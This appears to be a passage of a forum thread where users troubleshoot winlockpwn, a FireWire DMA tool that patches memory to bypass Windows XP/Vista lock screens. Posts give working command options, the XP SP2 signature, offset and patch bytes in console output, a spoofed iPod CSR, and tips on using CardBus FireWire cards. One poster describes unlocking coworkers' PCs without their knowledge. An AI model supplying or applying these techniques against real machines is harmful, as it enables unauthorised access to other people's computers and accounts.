
Thread: Tutorial Winlockpwn

  1. #31
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    2

    Default

    Was doing some testing against FileVault and finally realized I had access to another ROM type. So attached here is a CSR file snarfed from a PowerBook G4 in case anyone can find a use for it. Unfortunately, it acts just like the ipod.csr when used to spoof the remote end of a FireWire connection to Vista - at least for me. -tm

  2. #32

    Default

    I am having issues with it - any time I run ./businfo, nodecount=0, and anytime I run winlockpwn, it dies on the line where it tries to determine on which node it is.... the array just breaks... line 120.

  3. #33
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    So you run ./businfo. What does the ipod.csr come up as? It should be the only device, therefore port 0. Are you entering nodecount=0? You shouldn't have to.

  4. #34
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    7

    Default

    Quote Originally Posted by williamc View Post
    Updated Winlockpwn to support Vista and XP SP3.
    Any chance you'd be willing to search for offset values for regular and FUS unlocking in SP3? I'm gonna give it a shot this weekend, but I have never really analyzed or parsed memory addresses. I'll try to use the example provided at the moonloop site.

  5. #35
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Hello Guys,

    Would this work if I have a USB-to-Firewire cable? I am planning to plug the USB in BackTrack and the Firewire in the Windows machine.

    Thanks in advance,

  6. #36
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default

    Hi all,
    Did you successfully unlock Vista using your code?


    I'm researching this, but if anyone can shed some light on it, please do. I've purchased a CardBus FireWire card for use on PCs that don't have FireWire ports. You can plug it into a locked PC and the OS will install the drivers. Then just run winlockpwn and you're in! Guys in my office have disabled FireWire in the BIOS and set a password. Now I'll spend a lunch unlocking everyone's PC. What a surprise when they get back, hehe.

    An important note, if you're running this, use winlockpwn 0 1 2 instead of 0 1 3. The 3 option removes the password on all the accounts, which may cause some "issues" if you're in a corporate environment. The 2 option only unlocks the PC, should be enough for whatever mischief you're planning (and have permission to do so).

    William

  7. #37
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default

    williamc,
    I've tested winlockpwn on Windows XP SP2 with the latest update. It failed to unlock Windows XP SP2. But if I use a Windows XP SP2 box without the latest update, winlockpwn works well. I used the msv1.0 technique.

  8. #38
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default

    As far as I know, not with a USB-to-Firewire device. Currently I have successfully unlocked WinXP using PCMCIA-1394 and ExpressCard-1394.

    Quote Originally Posted by l1nuxant_ee View Post
    Hello Guys,

    Would this work if I have a USB-to-Firewire cable? I am planning to plug the USB in BackTrack and the Firewire in the Windows machine.

    Thanks in advance,

  9. #39
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    10

    Default

    Hi,

    I'm getting the following error when trying to run winlockpwn...

    Code:
    bt winlockpwn # ./winlockpwn 0 0 2
    Winlockpwn v1.5 Metlstorm, 2k6. <metlstorm@storm.net.nz>
    Target Selection:
     Name   : WinXP SP2 Unlock
     Notes  : When run against a locked XPSP2 box with regular non-fast-user-switching, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.
     Pattern: 0x0502000010
     Offset : [3696]
     Patch  : 0xb801000000
     Offset : 0
    Scanning Options:
     Start  : 0x8000000
     Stop   : 0xffffffff
     Pagesz : 4096
    Init firwire, port 0 node 0
    Snarfin' memories...
    Checking for signature on page at 0x08000000 (131072kB) at 0 kB/s...
    Traceback (most recent call last):
      File "./winlockpwn", line 163, in <module>
        mem = n.read(offset + so , len(pattern))
      File "/root/pythonraw1394/firewire.py", line 715, in read
        data +=str(raw1394.raw1394_py_read(self.port.h.h, self.getNodeID(), long(addrhi), long(addrlo), maxb))
    IOError: [Errno 22] Invalid argument

    My businfo is showing:

    Code:
    bt winlockpwn # ./businfo
    Firewire initialized, with 1 ports available:
    Enumerating port & node tree...
    Port(number=0, generation=17, busid=1023, localid=0, nodeCount=2, name='ohci1394')
    Node(number=0, nodeid=0xffc0)
    ConfigROM(
     Length                               : 16 bytes
     CRC Length                           : 16 bytes
     CRC                                  : 0x7286 (Valid)
     Bus ID                               : "1394"
     GUID                                 : 0x000a270002aa6ba7
     Vendor                               : 0x00000a27 (Apple Computer, Inc.)
     Link Speed                           : 2 (S400)
     Max Record Size                      : 10 (2048 bytes)
     Isochronous Capable                  : 0 (No)
     Bus Master Capable                   : 0 (No)
     Cycle Master Capable                 : 0 (No)
     Cycle Master Clock Accuracy          : 0 ppm
     Isochronous Resource Manager Capable : 0 (No)
     Root Directory: 16 bytes, crc: 0xf93c (Valid)
      0 (Immediate Value), 12 (Node Capabilities): 0x83c0
      0 (Immediate Value), 3 (Module Vendor ID): 0xa27 (Apple Computer, Inc.)
      2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 68 bytes
       TextLeaf: 32 bytes, crc: 0x96bc (Valid), language spec: 0x00000000 (XEROX CORPORATION), language id: 0x00000000,
       text: "Apple Computer, Inc."
      3 (Offset to Directory), 17 (Unit Directory): Offset: 4 bytes
        Unit Directory: 56 bytes, crc: 0xe5a0 (Valid)
        0 (Immediate Value), 18 (Unit Spec ID): 0x609e (ASC X3 - INFORMATION TECHNOLOGY STANDARDS SECRETARIATS)
        0 (Immediate Value), 19 (Unit SW Version): 0x10483
        0 (Immediate Value), 33 (Unknown 33): 0x1
        0 (Immediate Value), 58 (Unknown 58): 0xa08
        0 (Immediate Value), 62 (Unknown 62): 0x4c10
        0 (Immediate Value), 56 (Unknown 56): 0x609e
        0 (Immediate Value), 57 (Unknown 57): 0x104d8
        0 (Immediate Value), 59 (Unknown 59): 0x0
        0 (Immediate Value), 60 (Unknown 60): 0xa2700
        1 (Offset to Immediate Value), 20 (Unit Dependant Info): Offset: 65536 bytes Offset Data: **Offset to immediate beyond end of CSR space**
        0 (Immediate Value), 61 (Unknown 61): 0x3
        0 (Immediate Value), 20 (Unit Dependant Info): 0xe0000
        0 (Immediate Value), 23 (Model ID): 0x21
        2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 40 bytes
         TextLeaf: 16 bytes, crc: 0x34e7 (Valid), language spec: 0x00000000 (XEROX CORPORATION), language id: 0x00000000,
         text: "iPod"
    )
    Node(number=1, nodeid=0xffc1)
    ConfigROM(
     Length                               : 16 bytes
     CRC Length                           : 16 bytes
     CRC                                  : 0x7a41 (Invalid (0x2a72))
     Bus ID                               : "1394"
     GUID                                 : 0x00110666000007e6
     Vendor                               : 0x00001106 (Siemens NV (Belgium))
     Link Speed                           : 2 (S400)
     Max Record Size                      : 10 (2048 bytes)
     Isochronous Capable                  : 1 (Yes)
     Bus Master Capable                   : 1 (Yes)
     Cycle Master Capable                 : 1 (Yes)
     Cycle Master Clock Accuracy          : 0 ppm
     Isochronous Resource Manager Capable : 1 (Yes)
     Root Directory: 32 bytes, crc: 0x10cb (Invalid (0x0a69))
      0 (Immediate Value), 12 (Node Capabilities): 0x83c0
      0 (Immediate Value), 28 (Unknown 28): 0x50f2
      0 (Immediate Value), 29 (Unknown 29): 0x2
      0 (Immediate Value), 30 (Unknown 30): 0x0
      0 (Immediate Value), 3 (Module Vendor ID): 0x50f2 (MICROSOFT CORP.)
      2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 32 bytes
       TextLeaf: 32 bytes, crc: 0x7c05 (Invalid (0x1183)), language spec: 0x80000000 (), language id: 0x00000409,
       text: "Microsoft"
      3 (Offset to Directory), 17 (Unit Directory): Offset: 8 bytes
        Unit Directory: 16 bytes, crc: 0xade9 (Invalid (0x12e4))
        0 (Immediate Value), 18 (Unit Spec ID): 0x50f2 (MICROSOFT CORP.)
        0 (Immediate Value), 19 (Unit SW Version): 0x0
        0 (Immediate Value), 23 (Model ID): 0x0
        2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 40 bytes
         TextLeaf: 48 bytes, crc: 0xfc7d (Invalid (0xd16f)), language spec: 0x80000000 (), language id: 0x00000409,
         text: "1394 PC"
      3 (Offset to Directory), 17 (Unit Directory): Offset: 112 bytes
        Unit Directory: 16 bytes, crc: 0xadeb (Invalid (0x5178))
        0 (Immediate Value), 18 (Unit Spec ID): 0x5e (USC INFORMATION SCIENCES INST)
        0 (Immediate Value), 19 (Unit SW Version): 0x1
        0 (Immediate Value), 23 (Model ID): 0x7bb0cf
        2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 4 bytes
         TextLeaf: 24 bytes, crc: 0x3891 (Invalid (0xb6f2)), language spec: 0x80000000 (), language id: 0x00000409,
         text: "NIC1394"
    )
    I've been trying to get this working for a few days now, could anyone point out what I'm doing wrong? I've tried using ./winlockpwn 0 0 2 and ./winlockpwn 0 1 2...

    Cheers

  10. #40
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    10

    Default

    Apparently I need to rename or move the sbp2.ko module...
